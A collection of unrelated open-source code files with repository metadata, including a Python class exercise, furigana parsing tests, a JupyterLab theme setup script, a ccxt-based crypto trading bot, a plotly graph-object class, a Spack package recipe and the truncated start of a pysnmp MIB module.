|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/icecreamstand.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
class Restaurant():
"""A class representing a restaurant."""
def __init__(self, name, cuisine_type):
"""Initialize the restaurant."""
self.name = name.title()
self.cuisine_type = cuisine_type
self.number_served = 0
def describe_restaurant(self):
"""Display a summary of the restaurant."""
msg = self.name + " serves wonderful " + self.cuisine_type + "."
print("\n" + msg)
def open_restaurant(self):
"""Display a message that the restaurant is open."""
msg = self.name + " is open. Come on in!"
print("\n" + msg)
def set_number_served(self, number_served):
"""Allow user to set the number of customers that have been served."""
self.number_served = number_served
def increment_number_served(self, additional_served):
"""Allow user to increment the number of customers served."""
self.number_served += additional_served
class IceCreamStand(Restaurant):
"""Represent an ice cream stand."""
def __init__(self, name, cuisine_type='ice_cream'):
"""Initialize an ice cream stand."""
super().__init__(name, cuisine_type)
self.flavors = []
def show_flavors(self):
"""Display the flavors available."""
print("\nWe have the following flavors available:")
for flavor in self.flavors:
print("- " + flavor.title())
big_one = IceCreamStand('The Big One')
big_one.flavors = ['vanilla', 'chocolate', 'black cherry']
big_one.describe_restaurant()
big_one.show_flavors()
| 32.729167
| 78
| 0.638447
|
640ab6cfa03b4a086b8d72a3f2a4a04117ce4403
| 4,729
|
py
|
Python
|
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | 1
|
2022-01-19T16:45:23.000Z
|
2022-01-19T16:45:23.000Z
|
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | null | null | null |
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as ET
import pytest
from furiganalyse.parsing import process_tree
@pytest.mark.parametrize(
("test_case", "xml_str", "mode", "expected_xml_str"),
[
(
"Remove furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。<ruby>終<rt>おわり</rt></ruby></body>',
"remove",
'<body>はじめに、第一歩。終</body>',
),
(
"Remove furigana, handling rb elements",
"<body>黒い服を着た大人<ruby><rb>達</rb><rt>たち</rt></ruby>の間に</body>",
"remove",
"<body>黒い服を着た大人達の間に</body>",
),
(
"Remove furigana, handling rp elements",
"<body><ruby>漢<rp>(</rp><rt>Kan</rt><rp>)</rp>字<rp>(</rp><rt>ji</rt><rp>)</rp></ruby></body>",
"remove",
"<body>漢字</body>",
),
(
"Remove furigana, parent node with text",
'<body><ruby>第一<rt>ファースト</rt></ruby></body>',
"remove",
'<body>第一</body>',
),
(
"Remove furigana, no text",
'<body><ruby><rt>ファースト</rt></ruby></body>',
"remove",
'<body></body>',
),
(
"Remove furigana, no text or childs",
'<body><ruby></ruby></body>',
"remove",
'<body></body>',
),
(
"Override furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。<ruby>終<rt>おわり</rt></ruby></body>',
"replace",
'<body>はじめに、<ruby>第一歩<rt>だいいっぽ</rt></ruby>。<ruby>終<rt>おわり</rt></ruby></body>',
),
(
"Override furigana, handling rb elements",
"<body>大人<ruby><rb>達</rb><rt>あああ</rt></ruby>の間に</body>",
"replace",
"<body><ruby>大人<rt>おとな</rt></ruby><ruby>達<rt>たち</rt></ruby>の<ruby>間<rt>ま</rt></ruby>に</body>"
),
(
"Text may be positioned before, inside or after elements",
"""
<body class="p-text">
<div class="main2">
<p id="1">
1つの成功体験は
<a>ハーバード大学。</a>
その真ん中を
<span>はじめに、第一。</span>
</p>
その後で
</div>
</body>
""",
"add",
"""
<body class="p-text">
<div class="main2">
<p id="1">1つの<ruby>成功体験<rt>せいこうたいけん</rt></ruby>は<a>ハーバード<ruby>大学<rt>だいがく</rt></ruby>。</a>その<ruby>真<rt>ま</rt></ruby>ん<ruby>中<rt>なか</rt></ruby>を<span>はじめに、<ruby>第一<rt>だいいち</rt></ruby>。</span>
</p>その<ruby>後<rt>ご</rt></ruby>で</div>
</body>
""",
),
(
"Romaji is not modified",
'<body><p id="2">No kanji around here<br class="main"/></p></body>',
"add",
'<body><p id="2">No kanji around here<br class="main"/></p></body>',
),
(
"Escaped characters",
'<body>>ファスト&スロー<:'あなた'の意思"は"</body>',
"add",
'<body>>ファスト&スロー<:'あなた'の<ruby>意思<rt>いし</rt></ruby>"は"</body>',
),
(
"Applying the a title tag in the head",
'<head><title>世界一やさしい「やりたいこと」の見つけ方 人生のモヤモヤから解放される自己理解メソッド</title></head>',
"add",
'<head><title><ruby>世界一<rt>せかいいち</rt></ruby>やさしい「やりたいこと」の<ruby>見<rt>み</rt></ruby>つけ<ruby>方<rt>かた</rt></ruby> <ruby>人生<rt>じんせい</rt></ruby>のモヤモヤから<ruby>解放<rt>かいほう</rt></ruby>される<ruby>自己<rt>じこ</rt></ruby><ruby>理解<rt>りかい</rt></ruby>メソッド</title></head>',
),
(
"Don't override existing furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。</body>',
"add",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby><ruby>歩<rt>ふ</rt></ruby>。</body>',
),
(
"Tag inside of ruby subtags",
'<body><ruby>一<rb><span>辿</span></rb><rt><span>たど</span></rt>二</ruby>三</body>',
"add",
'<body><ruby>一<rb><span>辿</span></rb><rt><span>たど</span></rt>二</ruby><ruby>三<rt>さん</rt></ruby></body>',
),
]
)
def test_process_tree(test_case, xml_str, mode, expected_xml_str):
template = """
<?xml version='1.0' encoding='utf-8'?>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:epub="http://www.idpf.org/2007/ops" xml:lang="ja" class="hltr">
{}
</html>
""".strip()
tree = ET.fromstring(template.format(xml_str))
process_tree(tree, mode)
expected_tree = ET.fromstring(template.format(expected_xml_str))
assert ET.tostring(tree, encoding='unicode') == ET.tostring(expected_tree, encoding='unicode')
| 36.658915
| 261
| 0.472827
|
9d87b063e4cdde167fef43cbeef6a33df51e183b
| 1,505
|
py
|
Python
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | 1
|
2021-01-26T09:37:36.000Z
|
2021-01-26T09:37:36.000Z
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | 1
|
2021-02-23T12:31:35.000Z
|
2021-02-23T12:31:35.000Z
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | null | null | null |
# from keyboard import key_to_scan_codes
#TODO xmodmap bindings including modifiers
from functools import partial
import subprocess
from os import system
from pyudev.wx import MonitorObserver
GLOBAL = 0
keyscanmap = {'a': 38, 'b': 56}
class KeyMapping:
from_key: str
target_key: str
def __init__(self, a, b):
self.from_key, self.target_key = a, b
@classmethod
def from_str(cls, e: str):
return cls(*cls.parse(e))
@staticmethod
def parse(e: str):
"""
:param e: 'a -> α'
:return:
"""
return e.replace(' ', '').split('->')
def __repr__(self):
return f'(from: {self.from_key}, to: {self.target_key})'
def cmd(command:str):
return system(command)
def key_to_scan_code(k):
return keyscanmap[k]
class XBinder:
range: GLOBAL
def _bind(self, mapping: KeyMapping):
c = f'xmodmap -e "keycode {key_to_scan_code(mapping.from_key)} = {mapping.target_key}"'
print(c)
return cmd(c)
def bind(self, mapping: KeyMapping):
"""
:param mapping: Keymapping
:return: unbind method if binding success
"""
# if self._bind(mapping).returncode != 0:
# raise Exception('error binding')
# -----------
umapping = KeyMapping(mapping.from_key, mapping.from_key)
return partial(self._bind, umapping)
handler = XBinder()
tmp = KeyMapping.from_str('a -> b')
ubound = handler.bind(tmp)
print(ubound)
ubound()
| 22.462687
| 95
| 0.615947
|
baf01d521e4f4c8db116313139dbb6930796ebae
| 2,856
|
py
|
Python
|
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
jupyterlab-nm-theme setup
"""
import json
import sys
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
# Get the package info from package.json
pkg_json = json.loads((HERE / "package.json").read_bytes())
# The name of the project
name = "jupyterlab-nm-theme"
lab_path = (HERE / pkg_json["jupyterlab"]["outputDir"])
# Representative files that should exist after a successful build
ensured_targets = [
str(lab_path / "package.json")
]
labext_name = pkg_json["name"]
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path.relative_to(HERE)), "**"),
("share/jupyter/labextensions/%s" % labext_name, str("."), "install.json"),
]
long_description = (HERE / "README.md").read_text()
version = (
pkg_json["version"]
.replace("-alpha.", "a")
.replace("-beta.", "b")
.replace("-rc.", "rc")
)
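# Illustrative check (added sketch): the replacements above map npm-style
# prerelease tags to PEP 440 ones.
assert "1.2.0-alpha.3".replace("-alpha.", "a") == "1.2.0a3"
assert "1.2.0-rc.1".replace("-rc.", "rc") == "1.2.0rc1"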
setup_args = dict(
name=name,
version=version,
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
license_file="LICENSE",
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[],
zip_safe=False,
include_package_data=True,
python_requires=">=3.7",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Framework :: Jupyter",
"Framework :: Jupyter :: JupyterLab",
"Framework :: Jupyter :: JupyterLab :: 3",
"Framework :: Jupyter :: JupyterLab :: Extensions",
"Framework :: Jupyter :: JupyterLab :: Extensions :: Prebuilt",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args["cmdclass"] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args["data_files"] = get_data_files(data_files_spec)
except ImportError as e:
import logging
logging.basicConfig(format="%(levelname)s: %(message)s")
logging.warning("Build tool `jupyter-packaging` is missing. Install it with pip or conda.")
if not ("--name" in sys.argv or "--version" in sys.argv):
raise e
if __name__ == "__main__":
setuptools.setup(**setup_args)
| 30.063158
| 104
| 0.658263
|
2873edbf5e8065274bd1ab098086ade30e121357
| 8,785
|
py
|
Python
|
trading-bot/main.py
|
cryptometa708/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 14
|
2022-03-18T15:53:58.000Z
|
2022-03-25T12:32:08.000Z
|
trading-bot/main.py
|
MrBakali/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 1
|
2021-09-25T16:30:39.000Z
|
2021-09-26T23:11:31.000Z
|
trading-bot/main.py
|
MrBakali/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 1
|
2022-01-20T12:13:32.000Z
|
2022-01-20T12:13:32.000Z
|
import ccxt
import config
import schedule
import pandas as pd
import numbers
pd.set_option('display.max_rows', None)
import warnings
warnings.filterwarnings('ignore')
from datetime import datetime
import time
from stockstats import StockDataFrame as Sdf
# how much quote currency (example: DOGE) you want to spend on every trade
BALANCE = 0.5
# what percentage you want to earn on every trade
PERCENT_OF_GAIN_IN_FIAT_CURRENCY = 10
# the crypto that you want to invest in
symbol = 'BNB/USDT'
# RSI parameters
RSI_OVERBOUGHT = 70
RSI_OVERSOLD = 30
# trade mode
TRADE = True
EXCHANGE = ccxt.binance({
'options': {
'adjustForTimeDifference': True,
},
'enableRateLimit': True,
"apiKey": config.BINANCE_API_KEY,
"secret": config.BINANCE_SECRET_KEY,
})
EXCHANGE.load_markets()
def create_stock(historical_data):
stock = Sdf.retype(historical_data)
return stock
def in_position(amount, price, limits, precision):
    global symbol
    # The max-cost check applies only when the exchange reports a numeric
    # maximum; grouping it explicitly keeps it from short-circuiting the
    # other limit checks.
    cost_max_ok = (not isinstance(limits['cost']['max'], numbers.Number)
                   or (amount * price) <= limits['cost']['max'])
    condition = (limits['amount']['min'] <= amount <= limits['amount']['max']
                 and limits['price']['min'] <= price <= limits['price']['max']
                 and precision['price'] >= float(EXCHANGE.price_to_precision(symbol, price))
                 and (amount * price) >= limits['cost']['min']
                 and cost_max_ok)
    return condition
def info(df):
data = dict()
online_balance = EXCHANGE.fetchBalance()
data["quote"] = online_balance['total'][symbol.split("/")[0]]
data["price"] = df['close'][len(df) - 1]
limits = EXCHANGE.markets[symbol]['limits']
precision = EXCHANGE.markets[symbol]['precision']
data["sell_fees"] = EXCHANGE.markets[symbol]['taker']
data["buy_fees"] = EXCHANGE.markets[symbol]['maker']
data["fiat"] = float((online_balance['total'][symbol.split("/")[1]] / data["price"]) * (1 - data["buy_fees"]))
if data["fiat"] >= BALANCE:
data["fiat"] = BALANCE
data["in_position_to_buy"] = in_position(data["fiat"], data["price"], limits, precision)
data["in_position_to_sell"] = in_position(data["quote"], data["price"], limits, precision)
return data
def sell(data):
print(f"before sell {data}")
    # try to find open trades and sell them when the sell price is good enough to cover the fees
try:
trade_history = pd.read_csv("trades.csv")
except:
trade_history = pd.DataFrame(
columns=["symbol", "amount", "buy", "sell", "buy_price", "sell_price", "state", "buy_date", "sell_date"])
not_sold_trades = trade_history.loc[(trade_history['state'] == 0) & (trade_history['buy_price'] < data['price'])]
if data["in_position_to_sell"] and len(not_sold_trades) > 0:
for i in not_sold_trades.index:
sell_price = not_sold_trades['amount'][i] * data["price"]
buy_price = float(not_sold_trades['buy'][i])
if sell_price >= buy_price * (1 + (PERCENT_OF_GAIN_IN_FIAT_CURRENCY / 100)):
                # keep a copy of the dataframe so we can roll back if something goes wrong
roll_back = trade_history.copy()
trade_history['state'][i] = 1
trade_history['sell'][i] = sell_price
trade_history['sell_price'][i] = data["price"]
trade_history['sell_date'][i] = datetime.now().isoformat()
trade_history.to_csv("trades.csv", index=False, header=True)
try:
if TRADE:
return EXCHANGE.create_limit_sell_order(symbol, trade_history['amount'][i], data["price"])
except:
roll_back.to_csv("trades.csv", index=False, header=True)
file_put_contents("logs.txt", "exception in sell function check it")
return "not in position to sell"
return "not in position to sell"
def buy(data):
print(f"before buy {data}")
try:
trade_history = pd.read_csv("trades.csv")
except:
trade_history = pd.DataFrame(
columns=["symbol", "amount", "buy", "sell", "buy_price", "sell_price", "state", "buy_date", "sell_date"])
buy_price = data["fiat"] * (1 + 2 * data['buy_fees']) * data["price"]
sold_trades = trade_history.loc[trade_history['state'] == 1]
bought_trades = trade_history.loc[trade_history['state'] == 0]
average_sell_price = sold_trades["sell_price"].tail(20).mean()
average_buy_price = bought_trades["buy_price"].tail(20).mean()
formula = average_sell_price * (1 - (PERCENT_OF_GAIN_IN_FIAT_CURRENCY / (3 * 100)))
if trade_history.empty or (data["in_position_to_buy"] and ((sold_trades.size > 0 and formula >= data['price']) or (
sold_trades.size == 0 and average_buy_price >= data['price']))):
roll_back = trade_history.copy()
trade_history = trade_history.append(
{
"symbol": symbol,
"amount": data["fiat"],
"buy": buy_price,
"sell": 0.0,
"sell_price": 0.0,
"buy_price": data['price'],
"state": 0,
"buy_date": datetime.now().isoformat(),
"sell_date": 0
},
ignore_index=True)
trade_history.to_csv("trades.csv", index=False, header=True)
try:
if TRADE:
return EXCHANGE.create_limit_buy_order(symbol, data["fiat"], data["price"])
except Exception as error:
roll_back.to_csv("trades.csv", index=False, header=True)
file_put_contents("logs.txt", f"exception in buy function check it {error} {data}")
return None
def tr(data):
data['previous_close'] = data['close'].shift(1)
data['high-low'] = abs(data['high'] - data['low'])
data['high-pc'] = abs(data['high'] - data['previous_close'])
data['low-pc'] = abs(data['low'] - data['previous_close'])
return data[['high-low', 'high-pc', 'low-pc']].max(axis=1)
def atr(data, period):
data['tr'] = tr(data)
return data['tr'].rolling(period).mean()
def supertrend(df, period=7, atr_multiplier=1.5):
hl2 = (df['high'] + df['low']) / 2
df['atr'] = atr(df, period)
df['upperband'] = hl2 + (atr_multiplier * df['atr'])
df['lowerband'] = hl2 - (atr_multiplier * df['atr'])
df['in_uptrend'] = True
for current in range(1, len(df.index)):
previous = current - 1
if df['close'][current] > df['upperband'][previous]:
df['in_uptrend'][current] = True
elif df['close'][current] < df['lowerband'][previous]:
df['in_uptrend'][current] = False
else:
df['in_uptrend'][current] = df['in_uptrend'][previous]
if df['in_uptrend'][current] and df['lowerband'][current] < df['lowerband'][previous]:
df['lowerband'][current] = df['lowerband'][previous]
if not df['in_uptrend'][current] and df['upperband'][current] > df['upperband'][previous]:
df['upperband'][current] = df['upperband'][previous]
return df
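# --- Illustrative sketch (added for exposition; not part of the original file).
# supertrend() expects OHLC columns and annotates the frame with atr, the
# upper/lower bands and the in_uptrend flag. Synthetic candles below; wrapped
# in a function so nothing runs at import time.
def _demo_supertrend():
    candles = pd.DataFrame({
        'high': [float(i) + 1.0 for i in range(10)],
        'low': [float(i) - 1.0 for i in range(10)],
        'close': [float(i) for i in range(10)],
    })
    annotated = supertrend(candles.copy())
    print(annotated[['upperband', 'lowerband', 'in_uptrend']].tail(3))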
def check_buy_sell_signals(df, rsi):
print("checking for buy and sell signals")
last_row_index = len(df.index) - 1
previous_row_index = last_row_index - 1
data = info(df)
print(data)
if (not df['in_uptrend'][previous_row_index] and df['in_uptrend'][last_row_index]) or rsi < RSI_OVERSOLD:
print("changed to uptrend, buy")
order = buy(data)
print(f"buy signal received {order}")
if (df['in_uptrend'][previous_row_index] and not df['in_uptrend'][last_row_index]) or rsi > RSI_OVERBOUGHT:
print("changed to downtrend, sell")
order = sell(data)
print(f"sell signal received {order}")
def file_put_contents(file, data):
    with open(file, "a") as handle:
        handle.write(f"{data},{datetime.now().isoformat()}\n")
def run_bot():
# print(f"Fetching new bars for {datetime.now().isoformat()}")
bars = EXCHANGE.fetch_ohlcv(symbol, timeframe='1m', limit=100)
df = pd.DataFrame(bars[:-1], columns=['timestamp', 'open', 'high', 'low', 'close', 'volume'])
df['timestamp'] = pd.to_datetime(df['timestamp'], unit='ms')
supertrend_data = supertrend(df)
stock_data = Sdf.retype(df)
rsi = stock_data['rsi_14'].iloc[-1]
# print(f"RSI - {rsi} ---- {datetime.now().isoformat()}")
check_buy_sell_signals(supertrend_data, rsi)
def earning(trade_history):
sold_trades = trade_history.loc[trade_history['state'] == 1]
return sold_trades["sell"].sum() - sold_trades["buy"].sum()
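# Illustrative example (figures are made up, not from live data): a single
# closed trade with buy=100.0 and sell=105.0 makes earning() return 5.0.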
def action():
schedule.every(10).seconds.do(run_bot)
while True:
schedule.run_pending()
time.sleep(1)
action()
| 36.604167
| 120
| 0.615367
|
80e254de0cfbdf8c1d00212a7e82e6c00719e06f
| 873
|
py
|
Python
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
whitfin/spack
|
aabd2be31a511d0e00c1017f7311a421659319d9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3
|
2019-06-27T13:26:50.000Z
|
2019-07-01T16:24:54.000Z
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75
|
2016-07-27T11:43:00.000Z
|
2020-12-08T15:56:53.000Z
|
var/spack/repos/builtin/packages/r-visnetwork/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2015-10-16T13:51:49.000Z
|
2021-10-18T13:58:03.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RVisnetwork(RPackage):
"""Provides an R interface to the 'vis.js' JavaScript charting library. It
allows an interactive visualization of networks."""
homepage = "https://github.com/datastorm-open/visNetwork"
url = "https://cran.r-project.org/src/contrib/visNetwork_1.0.1.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/visNetwork"
version('1.0.1', 'dfc9664a5165134d8dbdcd949ad73cf7')
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-jsonlite', type=('build', 'run'))
depends_on('r-magrittr', type=('build', 'run'))
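# Usage note (added for illustration; not part of the generated package): once
# this file sits on a Spack repo path, the standard CLI drives it, e.g.
#
#     spack info r-visnetwork      # show the version and depends_on lines above
#     spack install r-visnetwork
#
# type=('build', 'run') marks each R dependency as needed both while building
# the package and whenever it runs.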
| 37.956522
| 79
| 0.703322
|
3439f83ecef8bc3a5221564a3c4741e606f7a57a
| 6,992
|
py
|
Python
|
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/graph_objs/funnel/connector/_line.py
|
labaran1/plotly.py
|
7ec751e8fed4a570c11ea4bea2231806389d62eb
|
[
"MIT"
] | null | null | null |
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "funnel.connector"
_path_str = "funnel.connector.line"
_valid_props = {"color", "dash", "width"}
# color
# -----
@property
def color(self):
"""
Sets the line color.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# dash
# ----
@property
def dash(self):
"""
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
The 'dash' property is an enumeration that may be specified as:
- One of the following dash styles:
['solid', 'dot', 'dash', 'longdash', 'dashdot', 'longdashdot']
- A string containing a dash length list in pixels or percentages
(e.g. '5px 10px 2px 2px', '5, 10, 2, 2', '10% 20% 40%', etc.)
Returns
-------
str
"""
return self["dash"]
@dash.setter
def dash(self, val):
self["dash"] = val
# width
# -----
@property
def width(self):
"""
Sets the line width (in px).
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the line color.
dash
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
width
Sets the line width (in px).
"""
def __init__(self, arg=None, color=None, dash=None, width=None, **kwargs):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.funnel.connector.Line`
color
Sets the line color.
dash
Sets the dash style of lines. Set to a dash type string
("solid", "dot", "dash", "longdash", "dashdot", or
"longdashdot") or a dash length list in px (eg
"5px,10px,2px,2px").
width
Sets the line width (in px).
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.funnel.connector.Line
constructor must be a dict or
an instance of :class:`plotly.graph_objs.funnel.connector.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("dash", None)
_v = dash if dash is not None else _v
if _v is not None:
self["dash"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
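# A minimal usage sketch (added for illustration; not part of the generated
# module). It assumes the public plotly API is available and shows how this
# Line class is reached through a funnel trace's connector.
def _connector_line_example():
    """Build a funnel trace whose connector uses a dotted blue line."""
    import plotly.graph_objects as go  # public entry point to graph objects

    return go.Figure(
        go.Funnel(
            y=["visit", "signup", "purchase"],
            x=[100, 60, 20],
            # the dict literal below is coerced into a funnel.connector.Line
            connector={"line": {"color": "royalblue", "dash": "dot", "width": 2}},
        )
    )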
| 33.777778
| 82
| 0.535898
|
d06816a9db6ef965f6aa4f5791580745a64f4171
| 53,786
|
py
|
Python
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/Zhone-VOICE-ANALOG-IF-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module Zhone-VOICE-ANALOG-IF-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Zhone-VOICE-ANALOG-IF-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:52:28 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
InterfaceIndex, ifIndex = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
